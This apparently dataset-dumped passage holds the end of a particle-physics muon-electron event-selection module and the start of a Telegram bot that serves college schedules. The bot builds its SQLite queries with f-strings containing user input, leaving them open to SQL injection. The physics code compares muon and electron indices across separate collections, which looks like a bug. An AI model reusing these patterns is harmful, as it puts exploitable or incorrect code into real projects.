\"Electron\")\n\n\n #####################################\n self.out.h_cutflow.Fill(self.Nocut)\n #####################################\n\n #####################################\n if not self.isData:\n self.out.h_cutflow.Fill(self.TotalWeighted, event.genWeight)\n else:\n self.out.h_cutflow.Fill(self.TotalWeighted, 1.)\n #####################################\n\n if not event.HLT_IsoMu27:\n return False\n\n #####################################\n self.out.h_cutflow.Fill(self.Trigger)\n #####################################\n\n idx_goodmuons = []\n \n for imuon in range(event.nMuon):\n\n if event.Muon_pt[imuon] < 28: continue\n if abs(event.Muon_eta[imuon]) > 2.4: continue\n if abs(event.Muon_dz[imuon]) > 0.2: continue\n if abs(event.Muon_dxy[imuon]) > 0.045: continue\n if not event.Muon_mediumId[imuon]: continue\n\n idx_goodmuons.append(imuon)\n\n\n if len(idx_goodmuons)==0:\n return False\n\n #####################################\n self.out.h_cutflow.Fill(self.GoodMuons)\n #####################################\n\n idx_goodelectrons = []\n \n for ielectron in range(event.nElectron):\n\n if event.Electron_pt[ielectron] < 20: continue\n if abs(event.Electron_eta[ielectron]) > 2.1: continue\n if abs(event.Electron_dz[ielectron]) > 0.2: continue\n if abs(event.Electron_dxy[ielectron]) > 0.045: continue\n if event.Electron_convVeto[ielectron] !=1: continue\n if ord(event.Electron_lostHits[ielectron]) > 1: continue\n# if event.Electron_mvaFall17Iso_WP80[ielectron] < 0.5: continue\n\n idx_goodelectrons.append(ielectron)\n\n\n if len(idx_goodelectrons)==0:\n return False\n\n #####################################\n self.out.h_cutflow.Fill(self.GoodElectrons)\n #####################################\n\n\n \n # to check dR matching\n\n electrons = Collection(event, \"Electron\")\n muons = Collection(event, \"Muon\")\n dileptons = []\n\n for idx1 in idx_goodmuons:\n for idx2 in idx_goodelectrons:\n \n if idx1 >= idx2: continue\n\n dR = muons[idx1].p4().DeltaR(electrons[idx2].p4())\n if dR < 0.5: continue\n \n muon_reliso = event.Muon_pfRelIso04_all[idx1]\n electron_reliso = event.Electron_pfRelIso03_all[idx2]\n\n # muon first\n _dilepton = DiLeptonBasicClass(idx1, event.Muon_pt[idx1], muon_reliso,\n idx2, event.Electron_pt[idx2], electron_reliso)\n\n dileptons.append(_dilepton)\n\n if len(dileptons)==0:\n return False\n\n\n #####################################\n self.out.h_cutflow.Fill(self.GoodDiLepton)\n #####################################\n\n dilepton = bestDiLepton(dileptons)\n\n# print 'chosen tau1 (idx, pt) = ', dilepton.tau1_idx, dilepton.tau1_pt, 'check', taus[dilepton.tau1_idx].p4().Pt()\n# print 'chosen tau2 (idx, pt) = ', dilepton.tau2_idx, dilepton.tau2_pt, 'check', taus[dilepton.tau2_idx].p4().Pt()\n\n jetIds = []\n\n jets = Collection(event, \"Jet\")\n# jets = filter(self.jetSel,jets):\n\n nfjets = 0\n ncjets = 0\n nbtag = 0\n\n for ijet in range(event.nJet):\n\n# for j in filter(self.jetSel,jets):\n\n\n if event.Jet_pt[ijet] < 30: \n continue\n\n if abs(event.Jet_eta[ijet]) > 4.7: \n continue\n\n dR = muons[dilepton.tau1_idx].p4().DeltaR(jets[ijet].p4())\n if dR < 0.5: \n continue\n\n dR = electrons[dilepton.tau2_idx].p4().DeltaR(jets[ijet].p4())\n\n if dR < 0.5: \n continue\n\n# print '#', ijet, 'pt = ', jets[ijet].p4().Pt(), event.Jet_pt[ijet]\n\n jetIds.append(ijet)\n \n if abs(event.Jet_eta[ijet]) > 2.4:\n nfjets += 1\n else:\n ncjets += 1\n\n if event.Jet_btagCSVV2[ijet] > 0.8838:\n nbtag += 1\n \n \n\n# eventSum = ROOT.TLorentzVector()\n#\n# for lep in electrons :\n# eventSum += 
lep.p4()\n#        for lep in electrons :\n#            eventSum += lep.p4()\n#        for j in filter(self.jetSel,jets):\n#            eventSum += j.p4()\n\n\n        # muon (lepton 1): dilepton.tau1_idx indexes the muon collection; pt_1/phi_1 feed pfmt_1 and dphi_ll below\n        self.out.pt_1[0] = event.Muon_pt[dilepton.tau1_idx]\n        self.out.eta_1[0] = event.Muon_eta[dilepton.tau1_idx]\n        self.out.phi_1[0] = event.Muon_phi[dilepton.tau1_idx]\n        self.out.mass_1[0] = event.Muon_mass[dilepton.tau1_idx]\n        self.out.dxy_1[0] = event.Muon_dxy[dilepton.tau1_idx]\n        self.out.dz_1[0] = event.Muon_dz[dilepton.tau1_idx]\n        self.out.q_1[0] = event.Muon_charge[dilepton.tau1_idx]\n        self.out.pfRelIso04_all_1[0] = event.Muon_pfRelIso04_all[dilepton.tau1_idx]\n\n        # electron (lepton 2): the electron collection is indexed with dilepton.tau2_idx, not the muon index\n        self.out.pt_2[0] = event.Electron_pt[dilepton.tau2_idx]\n        self.out.eta_2[0] = event.Electron_eta[dilepton.tau2_idx]\n        self.out.phi_2[0] = event.Electron_phi[dilepton.tau2_idx]\n        self.out.mass_2[0] = event.Electron_mass[dilepton.tau2_idx]\n        self.out.dxy_2[0] = event.Electron_dxy[dilepton.tau2_idx]\n        self.out.dz_2[0] = event.Electron_dz[dilepton.tau2_idx]\n        self.out.q_2[0] = event.Electron_charge[dilepton.tau2_idx]\n        self.out.pfRelIso03_all_2[0] = event.Electron_pfRelIso03_all[dilepton.tau2_idx]\n        self.out.cutBased_2[0] = event.Electron_cutBased[dilepton.tau2_idx]\n        self.out.mvaFall17Iso_2[0] = event.Electron_mvaFall17Iso[dilepton.tau2_idx]\n        self.out.mvaFall17Iso_WP80_2[0] = event.Electron_mvaFall17Iso_WP80[dilepton.tau2_idx]\n        self.out.mvaFall17Iso_WP90_2[0] = event.Electron_mvaFall17Iso_WP90[dilepton.tau2_idx]\n        self.out.mvaFall17Iso_WPL_2[0] = event.Electron_mvaFall17Iso_WPL[dilepton.tau2_idx]\n\n\n        if not self.isData:\n            self.out.genPartFlav_1[0] = ord(event.Muon_genPartFlav[dilepton.tau1_idx])\n            self.out.genPartFlav_2[0] = ord(event.Electron_genPartFlav[dilepton.tau2_idx])\n\n\n        # event identification, MET and vertex information\n        self.out.run[0] = event.run\n        self.out.luminosityBlock[0] = event.luminosityBlock\n        self.out.event[0] = event.event & 0xffffffffffffffff\n        self.out.MET_pt[0] = event.MET_pt\n        self.out.MET_phi[0] = event.MET_phi\n        self.out.PuppiMET_pt[0] = event.PuppiMET_pt\n        self.out.PuppiMET_phi[0] = event.PuppiMET_phi\n        self.out.MET_significance[0] = event.MET_significance\n        self.out.MET_covXX[0] = event.MET_covXX\n        self.out.MET_covXY[0] = event.MET_covXY\n        self.out.MET_covYY[0] = event.MET_covYY\n        self.out.fixedGridRhoFastjetAll[0] = event.fixedGridRhoFastjetAll\n        self.out.PV_npvs[0] = event.PV_npvs\n        self.out.PV_npvsGood[0] = event.PV_npvsGood\n\n        if not self.isData:\n            self.out.GenMET_pt[0] = event.GenMET_pt\n            self.out.GenMET_phi[0] = event.GenMET_phi\n            self.out.Pileup_nPU[0] = event.Pileup_nPU\n            self.out.Pileup_nTrueInt[0] = event.Pileup_nTrueInt\n            self.out.genWeight[0] = event.genWeight\n            self.out.LHE_Njets[0] = event.LHE_Njets\n\n\n        # sentinel defaults for the leading and sub-leading jet branches\n        self.out.jpt_1[0] = -9.\n        self.out.jeta_1[0] = -9.\n        self.out.jphi_1[0] = -9.\n        self.out.jcsvv2_1[0] = -9.\n        self.out.jdeepb_1[0] = -9.\n\n        self.out.jpt_2[0] = -9.\n        self.out.jeta_2[0] = -9.\n        self.out.jphi_2[0] = -9.\n        self.out.jcsvv2_2[0] = -9.\n        self.out.jdeepb_2[0] = -9.\n\n\n        if len(jetIds)>0:\n            self.out.jpt_1[0] = event.Jet_pt[jetIds[0]]\n            self.out.jeta_1[0] = event.Jet_eta[jetIds[0]]\n            self.out.jphi_1[0] = event.Jet_phi[jetIds[0]]\n            self.out.jcsvv2_1[0] = event.Jet_btagCSVV2[jetIds[0]]\n            self.out.jdeepb_1[0] = event.Jet_btagDeepB[jetIds[0]]\n\n        if len(jetIds)>1:\n            self.out.jpt_2[0] = event.Jet_pt[jetIds[1]]\n            self.out.jeta_2[0] = event.Jet_eta[jetIds[1]]\n            self.out.jphi_2[0] = event.Jet_phi[jetIds[1]]\n            self.out.jcsvv2_2[0] = event.Jet_btagCSVV2[jetIds[1]]\n            self.out.jdeepb_2[0] = event.Jet_btagDeepB[jetIds[1]]\n\n\n        self.out.njets[0] = len(jetIds)\n        self.out.nfjets[0] = nfjets\n        self.out.ncjets[0] = ncjets\n        self.out.nbtag[0] = nbtag\n\n        self.out.pfmt_1[0] = math.sqrt( 2 * self.out.pt_1[0] * self.out.MET_pt[0] * ( 1 - math.cos(deltaPhi(self.out.phi_1[0], self.out.MET_phi[0])) ) )\n        self.out.pfmt_2[0] = math.sqrt( 2 * self.out.pt_2[0] * self.out.MET_pt[0] * ( 1 - math.cos(deltaPhi(self.out.phi_2[0], self.out.MET_phi[0])) ) )\n\n        self.out.m_vis[0] = (muons[dilepton.tau1_idx].p4() + electrons[dilepton.tau2_idx].p4()).M()\n
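        # m_vis is the visible invariant mass of the selected mu-e pair, and pfmt_1/pfmt_2 above are\n        # the usual transverse masses, mT = sqrt(2 * pT(lep) * MET * (1 - cos(dphi(lep, MET)))),\n        # built from each lepton and the missing transverse energy.\n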
        self.out.pt_tt[0] = (muons[dilepton.tau1_idx].p4() + electrons[dilepton.tau2_idx].p4()).Pt()\n\n        self.out.dR_ll[0] = muons[dilepton.tau1_idx].p4().DeltaR(electrons[dilepton.tau2_idx].p4())\n        self.out.dphi_ll[0] = deltaPhi(self.out.phi_1[0], self.out.phi_2[0])\n\n\n        # pzeta calculation: project the visible dilepton system and the MET onto the\n        # bisector (zeta axis) of the two lepton transverse directions\n        leg1 = ROOT.TVector3(muons[dilepton.tau1_idx].p4().Px(), muons[dilepton.tau1_idx].p4().Py(), 0.)\n        leg2 = ROOT.TVector3(electrons[dilepton.tau2_idx].p4().Px(), electrons[dilepton.tau2_idx].p4().Py(), 0.)\n\n#        print 'leg1 px,py,pz = ', taus[dilepton.tau1_idx].p4().Px(), taus[dilepton.tau1_idx].p4().Py(), '0'\n#        print 'leg2 px,py,pz = ', taus[dilepton.tau2_idx].p4().Px(), taus[dilepton.tau2_idx].p4().Py(), '0'\n\n        met_tlv = ROOT.TLorentzVector()\n        met_tlv.SetPxPyPzE(self.out.MET_pt[0]*math.cos(self.out.MET_phi[0]),\n                           self.out.MET_pt[0]*math.sin(self.out.MET_phi[0]),  # py = MET*sin(phi)\n                           0,\n                           self.out.MET_pt[0])\n\n#        print self.out.MET_pt[0]*math.cos(self.out.MET_phi[0]), self.out.MET_pt[0]*math.sin(self.out.MET_phi[0]), '0', self.out.MET_pt[0]\n\n        metleg = met_tlv.Vect()\n        zetaAxis = ROOT.TVector3(leg1.Unit() + leg2.Unit()).Unit()\n        pZetaVis_ = leg1*zetaAxis + leg2*zetaAxis\n        pZetaMET_ = metleg*zetaAxis\n\n#        print 'pZetaVis = ', pZetaVis_, ' pZetaMET = ', pZetaMET_\n\n        self.out.pzetamiss[0] = pZetaMET_\n        self.out.pzetavis[0] = pZetaVis_\n        self.out.pzeta_disc[0] = pZetaMET_ - 0.5*pZetaVis_\n\n\n        # extra lepton vetos\n        self.out.extramuon_veto[0], self.out.extraelec_veto[0], self.out.dilepton_veto[0] = extraLeptonVetos(event, [dilepton.tau1_idx], [dilepton.tau2_idx], self.name)\n\n        self.out.isData[0] = self.isData\n\n        self.out.tree.Fill()\n\n        return True\n","sub_path":"MuEleModule.py","file_name":"MuEleModule.py","file_ext":"py","file_size_in_byte":12867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548897457","text":"#############\n##Libraries##\n#############\nimport sqlite3\nimport logging\nimport aiogram.utils.markdown as md\nimport keyboard as keyboard\nimport datetime\nimport calendar\nimport lxml\nimport time\nimport random\nimport asyncio\nimport aioschedule\nimport pandas as pd\nimport schedule\nimport subprocess\nimport emoji\nimport os\n\nfrom aiogram.types import InputFile\nfrom aiogram import Bot, types, Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.utils import executor\nfrom aiogram.types import ReplyKeyboardRemove, ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton, ParseMode, Message\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.utils.helper import Helper, HelperMode, ListItem\nfrom config import bot_token, admin_id, admin2_id\nfrom datetime import date, timedelta\nfrom bs4 import BeautifulSoup\nfrom markdown import markdown\nfrom pprint import pprint\n\n\ndef steare():\n    subprocess.Popen(['python3', 'take_resp.py'])\n    subprocess.Popen(['python3', 'butify.py'])\n\n\n\n#############\n##Variables##\n#############\nglobal key, chisl, x, y, cikl\n\nchisl = ''\nx = 0\ny = 0\ncikl = 0\nkey = 0\n\n###########\n##Logging##\n###########\nlogging.basicConfig(level=logging.INFO)\n\n##########\n##States##\n##########\nclass States(StatesGroup):\n    group = State()\n    setting = State()\n    adm1 = State()\n    adm1_set = State()\n    sndmsg = State()\n    fio = State()\n\n##############\n##Bot object##\n##############\nbot = 
Bot(token=bot_token)\n\n############################\n##Диспетчер(Для хэндлеров)##\n############################\ndp = Dispatcher(bot, storage=MemoryStorage())\n\n############################\n##Даты и имена дней недели##\n############################\ntoday_week = datetime.datetime.today().isocalendar()[1]\ntoday_day = datetime.datetime.today().weekday()\ndays_naming = [\"Понедельник\",\"Вторник\",\"Среда\",\"Четверг\",\"Пятница\",\"Суббота\",\"Воскресенье\"]\ndays_naming_en = [\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\",\"saturday\", \"sunday\"]\ntoday = date.today()\ncalendar.day_name[today.weekday()]\nnext_day = today_day + 1\nif next_day == 7:\n next_day = 0\n\n###################################################\n##Парсинг уведомления с главной страницы колледжа##\n###################################################\nasync def started():\n global message_for_see\n try:\n with open (f'/home/{os.getlogin()}/horde/info_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.html') as file:\n src1 = file.read()\n\n soup1 = BeautifulSoup(src1, \"lxml\")\n\n all_p = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p1 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p2_1 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p2_2 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p2 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p2_3 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p3 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p4 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# message_for_see = f\"{all_p.get_text()}\\n{all_p1.get_text()}\\n{all_p2_1.get_text()}\\n{all_p2_2.get_text()}\\n\\n{all_p2_3.get_text()}\\n{all_p3.get_text()}\\n{all_p2.get_text()}\\n{all_p4.get_text()}\"\n message_for_see = f\"{all_p.get_text()}\"\n except Exception as ext:\n print(ext)\n\n#############################\n##База данных пользователей##\n#############################\nconn = sqlite3.connect('users_database.db')\ncur = conn.cursor()\ncur.execute('CREATE TABLE IF NOT EXISTS users(user_id INTEGER, group_number TEXT, notify_times TEXT)')\ncur.execute('CREATE TABLE IF NOT EXISTS prepods(user_id INTEGER, prep_name TEXT, notify_times TEXT)')\n\n#############################\n##База данных пользователей##\n#############################\ndbfile = InputFile(\"users_database.db\", filename=\"users_database.db\")\n\n################\n##Текущий день##\n################\nasync def week():\n global key\n global cikl\n global cikl1\n global key1\n if (today_week % 2 == 0):\n chisl = 'Числитель'\n else:\n chisl = 'Знаменатель'\n if (chisl 
== 'Знаменатель' and today_day==0):\n cikl = 0\n cikl1 = 6\n elif (chisl == 'Знаменатель' and today_day==1):\n cikl = 6\n cikl1 = 12\n elif (chisl == 'Знаменатель' and today_day==2): \n cikl = 12 \n cikl1 = 18\n elif (chisl == 'Знаменатель' and today_day==3):\n cikl = 18\n cikl1 = 24\n elif (chisl == 'Знаменатель' and today_day==4):\n cikl = 24\n cikl1 = 30\n elif (chisl == 'Знаменатель' and today_day==5):\n cikl = 30\n cikl1 = 100\n elif (chisl == 'Знаменатель' and today_day==6): \n cikl = 100\n cikl1 = 36\n elif (chisl == 'Числитель' and today_day == 0):\n cikl = 36\n cikl1 =42\n elif (chisl == 'Числитель' and today_day==1):\n cikl = 42\n cikl1 = 48\n elif (chisl == 'Числитель' and today_day==2): \n cikl = 48\n cikl1 = 54 \n elif (chisl == 'Числитель' and today_day==3):\n cikl = 54\n cikl1 = 60\n elif (chisl == 'Числитель' and today_day==4):\n cikl = 60\n cikl1 = 66\n elif (chisl == 'Числитель' and today_day==5):\n cikl = 66\n cikl1 = 100\n elif (chisl == 'Числитель' and today_day==6): \n cikl = 100 \n cikl1 = 0\n key = cikl + 6\n key1 = cikl1 + 6\n\n####################\n##Основные функции##\n####################\n@dp.message_handler(commands='start')\nasync def start(message : types.Message):\n cur.execute(f'INSERT OR REPLACE INTO users VALUES(\"{message.from_user.id}\",\"0\",\"0\")')\n conn.commit()\n texter = 'Добро пожаловать в petroshedulebot, мои создатели:\\nБерозко Роман\\nАверин Андрей\\n\\nCтуденты группы 39-55'\n await bot.send_photo(message.from_user.id, \n 'https://www.directum.ru/application/images/catalog/34597121.PNG', \n texter, \n reply_markup=keyboard.button_register,\n )\n await message.answer(f'Сегодня: {today}\\n{days_naming[today_day]}')\n\n\n@dp.message_handler(text=['Регистрация'])\nasync def register(message: types.Message):\n await bot.send_message(message.from_user.id,'Кто ты?',\n reply_markup=keyboard.button_who,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":school_satchel:\", use_aliases=True)}Я студент'])\nasync def student_register(message: types.Message):\n await States.group.set()\n await bot.send_message(message.from_user.id,\n 'Напиши номер своей группы',\n )\n\n\n@dp.message_handler(state=States.group)\nasync def group_number(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n global group\n data['group'] = message.text\n await bot.send_message(message.chat.id, \n md.text(md.text('Ваша группа:', \n md.bold(data['group']))), \n parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup= keyboard.button_go_main\n )\n grouper = md.text(md.text(md.bold(data['group'])))\n data = markdown(grouper)\n group = ''.join(BeautifulSoup(data).findAll(text=True))\n print(group)\n cur.execute(f'UPDATE users SET group_number = \"{group}\" WHERE user_id = \"{message.from_user.id}\"')\n conn.commit()\n await state.finish()\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":mortar_board:\", use_aliases=True)}Я преподаватель'])\nasync def teacher_register(message: types.Message):\n cur.execute(f'INSERT OR REPLACE INTO prepods VALUES(\"{message.from_user.id}\",\"0\",\"0\")')\n conn.commit()\n await States.fio.set()\n await bot.send_message(message.from_user.id, 'Укажите свои ФИО как в расписании\\nПример: Фамилия И.О.')\n\n\n@dp.message_handler(state=States.fio)\nasync def fio(message: types.Message, state: FSMContext):\n async with state.proxy() as names:\n global fiot\n names['fiot'] = message.text\n await bot.send_message(message.chat.id, \n md.text(md.text('Ваше ФИО:', \n md.bold(names['fiot']))), \n parse_mode=ParseMode.MARKDOWN_V2,\n 
reply_markup= keyboard.button_go_main\n )\n grouper = md.text(md.text(md.bold(names['fiot'])))\n names = markdown(grouper)\n fiot = ''.join(BeautifulSoup(names).findAll(text=True))\n print(fiot)\n cur.execute(f'UPDATE prepods SET prep_name = \"{fiot}\" WHERE user_id = \"{message.from_user.id}\"')\n conn.commit()\n await state.finish()\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":wrench:\", use_aliases=True)}Настройки', f'{emoji.emojize(\":wrench:\", use_aliases=True)}Назад в настройки'])\nasync def setting(message: types.Message):\n await message.answer('Добро пожаловать в меню настроек', \n reply_markup=keyboard.button_notify,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":card_index:\", use_aliases=True)}Сменить группу'])\nasync def rewrite (message: types.Message):\n await States.group.set()\n await message.answer('Введите новый номер группы:')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":name_badge:\", use_aliases=True)}Сменить ФИО'])\nasync def rewrite_fio (message: types.Message):\n await States.fio.set()\n await message.answer('Введите новое ФИО\\nПример: Фамилия И.О.')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":clock1:\", use_aliases=True)}Время уведомлений', 'Время уведомлений'])\nasync def time_quest (message: types.Message):\n await message.answer('После смены времени нужно будет снова включить уведомления\\nВведите время в формате: 00:00')\n await States.setting.set()\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":ballot_box_with_check:\", use_aliases=True)}Вкл/Выкл уведомлений'])\nasync def time_set (message: types.Message):\n cur.execute(f'SELECT * FROM users WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n time = [list(result[0])[2]][0]\n global x\n global y\n x = x + 1\n if x == 2:\n x = 0\n if x == 0:\n await message.answer ('Уведомления отключены')\n if x == 1 and y == 1:\n await message.answer('Уведомления на пары след. 
дня включены')\n await scheduler(message, time)\n elif x == 1 and y == 0:\n await message.answer('Уведомления на пары текущего дня включены')\n await scheduler_td(message, time)\n \n\n@dp.message_handler(state=States.setting)\nasync def times_setting_set (message: types.Message, state = FSMContext):\n async with state.proxy() as times:\n global x\n x = 0\n times['times_set'] = message.text\n await bot.send_message(message.chat.id, \n md.text(md.text('Установленное время:', \n md.bold(times['times_set']))), \n parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup= keyboard.button_notify\n )\n timers = md.text(md.text(md.bold(times['times_set'])))\n rework = markdown(timers)\n setted_time = ''.join(BeautifulSoup(rework).findAll(text=True))\n cur.execute(f'UPDATE users SET notify_times = \"{setted_time}\" WHERE user_id = \"{message.from_user.id}\"')\n cur.execute(f'UPDATE prepods SET notify_times = \"{setted_time}\" WHERE user_id = \"{message.from_user.id}\"')\n conn.commit()\n await state.finish()\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":book:\", use_aliases=True)}Пары на сегодня/завтра'])\nasync def change_day(message: types.Message):\n await message.answer('На какой день вы хотите получать расписание в установленное время?',\n reply_markup=keyboard.btn_change_day,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":notebook:\", use_aliases=True)}На сегодня'])\nasync def pare_today(message: types.Message):\n global y\n y = 0\n await message.answer('Вы будете получать уведомление на текущий день')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":notebook_with_decorative_cover:\", use_aliases=True)}На завтра'])\nasync def pare_next_day(message: types.Message):\n global y\n y = 1\n await message.answer('Вы будете получать уведомление на следующий день')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":clipboard:\", use_aliases=True)}Получить расписание'])\nasync def schedule_menu(message: types.Message):\n await message.answer('Выберите на какой день получить расписание', \n reply_markup=keyboard.button_schedule_choise,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":page_facing_up:\", use_aliases=True)}Расписание на сегодня'])\nasync def schedule_today(message: types.Message):\n await week()\n global cikl, key\n if(cikl==100):\n await message.answer('Нет расписания на воскресенье')\n else:\n try:\n para_num = 1\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM users WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n stud = pd.read_excel(f'stud_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.xlsx')\n s1 =(stud[f'{[list(result[0])[1]][0]}'].tolist())\n group_num = [list(result[0])[1]][0]\n text = ''\n while cikl < key:\n skip = str(s1[cikl])\n if (skip == 'nan'):\n text = f'{text}\\n\\n{para_num} пара:\\n -'\n cikl = cikl + 1\n para_num = para_num + 1\n else:\n text = f'{text}\\n\\n{para_num} пара:\\n {s1[cikl]}'\n cikl = cikl + 1\n para_num = para_num + 1\n await message.answer(text)\n try:\n i = '1'\n num_para = ''\n conn = sqlite3.connect('zamen.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE groups LIKE \"%{group_num}%\"')\n res1 = cur.fetchall()\n b1 = \"\"\n first_lession = ''\n schet = 0\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if 
num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n conn = sqlite3.connect('zamen1.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE groups LIKE \"%{group_num}%\"')\n res1 = cur.fetchall()\n schet = 0\n num_para = ''\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n \n except Exception as ext:\n print(ext)\n await message.answer(f'{first_lession}{b1}')\n\n\n except Exception:\n try:\n para_num = 1\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM prepods WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n stud = pd.read_excel(f'prep_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.xlsx')\n s1 =(stud[f'{[list(result[0])[1]][0]}'].tolist())\n prepodavat = [list(result[0])[1]][0]\n text = ''\n skip = ''\n while cikl < key:\n skip = str(s1[cikl])\n if (skip == 'nan'):\n text = f'{text}\\n\\n{para_num} пара:\\n -'\n cikl = cikl + 1\n para_num = para_num + 1\n else:\n text = f'{text}\\n\\n{para_num} пара:\\n {s1[cikl]}'\n cikl = cikl + 1\n para_num = para_num + 1\n await message.answer(text)\n try:\n conn = sqlite3.connect('zamen.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE para_zam LIKE \"%{prepodavat}%\"')\n res1 = cur.fetchall()\n b1 = \" \"\n i = '1'\n first_lession = ''\n schet = 0\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n conn = sqlite3.connect('zamen1.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE para_zam LIKE \"%{prepodavat}%\"')\n res1 = cur.fetchall()\n schet = 0\n num_para = ''\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n except Exception as ext:\n print(ext)\n await message.answer(f'{first_lession}{b1}')\n except Exception:\n await message.answer('Если вы не получили расписание проверьте профиль')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":page_with_curl:\", use_aliases=True)}Расписание на завтра'])\nasync def schedule_next_day(message: types.Message):\n await week()\n global cikl1, key1\n if(cikl1==100):\n await message.answer('Нет расписания на 
